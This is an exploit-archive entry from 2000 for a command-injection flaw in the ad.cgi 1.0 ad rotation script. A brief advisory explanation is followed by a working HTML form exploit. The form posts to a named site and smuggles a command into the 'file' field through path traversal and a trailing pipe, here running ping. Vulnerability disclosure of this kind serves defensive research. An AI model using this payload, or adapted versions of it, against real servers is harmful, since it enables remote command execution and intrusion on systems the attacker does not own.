Leif M. Wright - ad.cgi 1.0 Unchecked Input

Type exploitpack
Reporter rpc
Modified 2000-12-11T00:00:00


Leif M. Wright - ad.cgi 1.0 Unchecked Input

                                            source: https://www.securityfocus.com/bid/2103/info

ad.cgi is an ad rotation script freely available, and written by Leif Wright. A problem exists in the script which may allow access to restricted resources.

The problem occurs in the method in which the script checks input. Due to insufficent validation of input, the script allows a user to execute programs on the local system by making use of the FORM method. This makes it possible for a malicious users to remotely execute commands on the system with the priviledges inherited by the HTTPD process. 

<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
<input type=submit value=run>